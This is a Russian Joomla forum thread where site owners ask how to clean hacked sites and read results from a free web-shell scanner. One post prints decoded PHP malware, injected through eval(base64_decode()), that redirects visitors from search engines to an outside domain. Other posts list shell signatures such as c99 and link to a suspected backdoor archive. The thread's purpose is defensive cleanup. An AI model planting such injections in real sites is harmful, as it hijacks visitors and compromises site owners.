Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 299 Ответов
  • 170472 Просмотров
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
В бесплатный сканер добавлена база и функционал, теперь он работает практически на 100%, практически из-за его функциональности, нет возможности дать ему работать на все 100%. На сколько смогли на столько и увеличили объем его работы. Протестировали как можно и выложили в паблик.

Если у кого шарада хост и сервер уходит в аут ^-^ то, сканировать можно не из корня, а по отдельности папки, тогда дохлые сервера все обработают.

В новом сканере тоже добавили функционал и базу. Также выложили урезанную по базе и функционалу демо версию для просмотра возможностей.
*

nerei

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Добрый день!

Сейчас ищу в папках сайта eval(base64
Возник такой вопрос, все ли их можно удалять, к примеру: прячутся в таких вот строках:
Код
<h3><?php eval(base64_decode("echo _KUNENA_WELCOME;?>


После декода вышло это:
Код
error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://www.mynewn.epac.to/");
exit();
}
}
}

удалять ?
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Да.Там редирект для пришедших с поисковиков
*

nerei

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Спасибо, а хвост этот обязательно удалять
Код
_KUNENA_WELCOME;?>
  ? Ничего не посыпется из за него ?
*

FerrisBuller

  • Новичок
  • 2
  • 0 / 0
  • http://kanalbiz.ru
Ситуация следующая:

Сайт кто-то хакнул, зачем-то в htacesss дописывает редирект на форум про кофе, зачем не понятно.

Запустил fls.php выпали результаты,
среди которых были как мне кажется подозрительны
с99 и Chartreuse,

также были:
$_POST
$_POST[
$pass
 $_COOKIE
$_REQUEST
confirm(
NCC
oRb
zerofill
urldecode
gzuncompress

Вопрос -- как выяснить какой из файлов хакнут и что в нем подчистить.

п.с. к сожалению архива чистой темы нет, на старой банке он...
но если сильно прижмет, то найдем.
« Последнее редактирование: 18.10.2013, 14:02:09 от FerrisBuller »
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
обязательно удалять
Код
_KUNENA_WELCOME;?>
  ? Ничего не посыпется из за него ?
Это языковой ключ расширения-форум Kunena. Если форума нет, то удаляй.
Цитировать
Вопрос -- как выяснить какой из файлов хакнут и что в нем подчистить.
Проверять на соответствие файлу из архива разработчика, и скачанного из проверенного источника
*

danavir

  • Захожу иногда
  • 96
  • 0 / 0
  • S.DAN
Меня тоже интересует вопрос по выдачи.
Вышел набор:
String: confirm(
String: $pass
String: $_COOKIE
String: urldecode
String: NCC
String: $_POST
String: $_POST[
String: $_REQUEST
String: gzuncompress
String: zerofill
String: phpinfo()
String: c99
String: c100
String: boff
String: Chartreuse

Какие смотеть точно?
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
*

atolic

  • Захожу иногда
  • 70
  • 0 / 0
Сажите почему файл скрипта fls- PHP Sell&Backdoor сам определяется Антивирусом как ВИРУС?
Спойлер
[свернуть]
*

atolic

  • Захожу иногда
  • 70
  • 0 / 0
Сажите почему файл скрипта fls- PHP Sell&Backdoor сам определяется Антивирусом как ВИРУС?
Спойлер
[свернуть]
проерял на virustotal.ком
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
проерял на virustotal.ком
Потому, что он в себе содержит те сигнатуры, по которому и выявляет те самые шелы/бегдоры!

Меня тоже интересует вопрос по выдачи.
Вышел набор:
String: confirm(
String: $pass
String: $_COOKIE
String: urldecode
String: NCC
String: $_POST
String: $_POST[
String: $_REQUEST
String: gzuncompress
String: zerofill
String: phpinfo()
String: c99
String: c100
String: boff
String: Chartreuse

Какие смотеть точно?
Смотрите все, анализируя логику выполнения.
*

alnorton

  • Захожу иногда
  • 206
  • 8 / 0
Новый проект. Сайту две недели не полные.
Joomla!3x, обновляется регулярно - сама)). Все расширения скачивал с официальных сайтов. Шаблон фиксил сам - ни чего не дописывая, только удаляя лишнее.
Доступа ни у кого, кроме меня и (хостера  ^-^) нет.
Комп рабочий стоит под комплексной защитой сервера антивирусного - даже порнуху гад не дает посмотреть  ^-^ ^-^.
Про пароли:
Спойлер
[свернуть]

Ну вроде по максимуму обезопасился перед началом работ.
Нарвался на эту ветку, скачал, проверил (вроде береженого Бог бережет)...

Chartreuse...
Повылазило в файлах редактора JCE. Скачивал у разработчика...
С99...
В картинках, которые я лично загружал - мои они)), и что интересно: одна картинка - с99, а остальные нет...
и в картинках шаблонов. шаблоны от разработчиков напрямую брал...
и в файлах редактора JCE. Скачивал у разработчика...
modules/mod_maximenuck/elements/ckmaximenuwizard/mobilemenu_topfixed.jpg. вот только что у разработчика скачал.
NCC...
com_attachments/images/help/en-GB/permissions-scenario2.png. Скачивал у разработчика...
boff...
media/editors/codemirror/mode/sql/sql.js - это вообще с сиэмэской ставится.
zerofill...
media/editors/codemirror/mode/sql/sql.js - это вообще с сиэмэской ставится.
media/editors/codemirror/mode/sql/sql.min.js - это вообще с сиэмэской ставится.
=================================================================

Сжальтесь, гуру, подскажите каким боком на это смотреть? Что такое zerofill, boff, NCC, С99 и Chartreuse.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Чем сканировали? в некоторых файлах бывают ложные срабатывание, так как используется часто распространенная сигнатура, тут только ручной анализ скажет вам правду!
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Что такое zerofill, boff, NCC, С99 и Chartreuse
Название шелов. Сканер находит и показывает те файлы которые могут содержать сигнатуры кода, если в файлах есть из писка в коде сигнатуры то сканер указывает и на них для ручной проверки(не обязательно что они заражены). Все сканеры облегчают поиск но нет универсальных которые за вас сделают работу. Чистка сайтов это ручная работа. Обязательно смотреть код глазами требуется.
*

alnorton

  • Захожу иногда
  • 206
  • 8 / 0
Огромное спасибо за оперативность, коллеги. Даже и не рассчитывал так быстро ответ увидеть, а тут аж - три))

Чем сканировали? в некоторых файлах бывают ложные срабатывание, так как используется часто распространенная сигнатура, тут только ручной анализ скажет вам правду!
Сканер взял с сайта ТС данной темы: Site-Security (fls.php)

Открой картинку редактором Notepad++ и найди с99
Благодарю  *DRINK*, успокоил, действительно есть несколько вхождений по с99 в картинке))

Название шелов. Сканер находит и показывает те файлы которые могут содержать сигнатуры кода, если в файлах есть из писка в коде сигнатуры то сканер указывает и на них для ручной проверки(не обязательно что они заражены). Все сканеры облегчают поиск но нет универсальных которые за вас сделают работу. Чистка сайтов это ручная работа. Обязательно смотреть код глазами требуется.
Про ручную проверку предполагал, просто страшно стало, что сновА и сразу в яму)). Раньше варезниками пугали (да жизнь, как по Высоцкому, учила и наказывала ^-^), а тут, вроде все с официальных сайтов и на тебе.
Типа - легкий шок)).

Еще раз благодарю.
*

alnorton

  • Захожу иногда
  • 206
  • 8 / 0
Ну раз пошла такая пьянка - добавлю и свои три копейки в спокойствие будущих поколений)):
c99 и Chartreuse в скриптах JCE - это всего на всего определение цветовых значений.

c99 - встречается, например, в ряду: #cc9900","#cc9933","#cc9966","#cc9999","#cc99cc" и тд...
а Chartreuse стоит в одном ряду с такими определениями, как BlueViolet','#A52A2A':'Brown','#DEB887':'BurlyWood','#5F9EA0':'CadetBlue','#7FFF00':'Chartreuse','#D2691E':'Chocolate','#FF7F50':'Coral
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Щас по сигнатуре c99 больше ложных сробатываний, чем оно есть на самом деле, на месте ТС я бы лучше убрал эту сигнатуру и модифецировал бы по подобию шела на что нить другое
*

vitmail99

  • Захожу иногда
  • 67
  • 2 / 2
по-ходу ваш сайт вирусы убили! ссылка не работает http://site-security.ru/nash-pervyj-skaner.html
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
по-ходу ваш сайт вирусы убили! ссылка не работает http://site-security.ru/nash-pervyj-skaner.html
:laugh:
Кому он нужен, если только сами прибьем его  yes!
если что то интересует спросите напрямую
*

Dmitrii

  • Новичок
  • 1
  • 0 / 0
Нашёл .../modules/mod_speedup/mod_speedup.php
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Нашёл .../modules/mod_speedup/mod_speedup.php

а код модуля можно увидеть? недавно тоже нашел уязвимость в одном, не распространенном модуле: https://forum.antichat.ru/threads/50600/page-15#post-3917008  Joomla "mod_fxprev" exploit
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
*

DeDMazday

  • Осваиваюсь на форуме
  • 16
  • 0 / 0
Господа, посоветуйте - на сайте обнаружился вредоносный код, к я его уже поудалял большей частью, но судя по тому что стопроцентно удалить не удается (это уже 3 попытка), видимо не всё, нашелся файл на который даже касперский ругается, возможно это как раз черный ход? Поглядите пожалуйста кто понимает в этом... http://travelsbase.ru/sys_conf.zip файл в архиве, пароль 1
*

nick71

  • Завсегдатай
  • 1145
  • 12 / 12
  • Сайты любой сложности - обращайтесь
Господа, посоветуйте - на сайте обнаружился вредоносный код, к я его уже поудалял большей частью, но судя по тому что стопроцентно удалить не удается (это уже 3 попытка), видимо не всё, нашелся файл на который даже касперский ругается, возможно это как раз черный ход? Поглядите пожалуйста кто понимает в этом... http://travelsbase.ru/sys_conf.zip файл в архиве, пароль 1
удаляй. Но не факт что этим ты решишь проблему, таких файлов еще куча может быть. Плюс если ты просто поудалял файлы но не поменял все пароли - на сайте и хостинге - все пойдет по новой
*

DeDMazday

  • Осваиваюсь на форуме
  • 16
  • 0 / 0
Пароли то я сменил, беспокоит что действительно может какие то огрызки остались, а не проще снести всё нафиг, оставить только шаблон и бд и ставить заново? в шаблоне не так много файлов их в конце концов можно просто изучить все (к сожалению бекап сайта есть но довольно старый)
*

nick71

  • Завсегдатай
  • 1145
  • 12 / 12
  • Сайты любой сложности - обращайтесь
все снести это при возможности - лучший вариант.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Пароли то я сменил, беспокоит что действительно может какие то огрызки остались, а не проще снести всё нафиг, оставить только шаблон и бд и ставить заново? в шаблоне не так много файлов их в конце концов можно просто изучить все (к сожалению бекап сайта есть но довольно старый)
Если вам своего времени не жалко то можно и так поступать, обычно все (недельные и месячные, а у кого и годовые) танцы с бубнами не равны 2-8тр профессионалов по чистке и обновлению, которое выполняется быстро и качественно.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 351
Последний ответ 31.03.2024, 16:14:32
от SeBun
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

Ответов: 678
Просмотров: 244158
Последний ответ 14.09.2022, 14:29:43
от wishlight
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 1316
Последний ответ 05.10.2021, 21:39:26
от ShopES
Тестирую сайты на уязвимости

Автор SalityGEN

Ответов: 0
Просмотров: 486
Последний ответ 21.08.2021, 23:01:01
от SalityGEN
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 1091
Последний ответ 03.11.2020, 17:36:03
от Cedars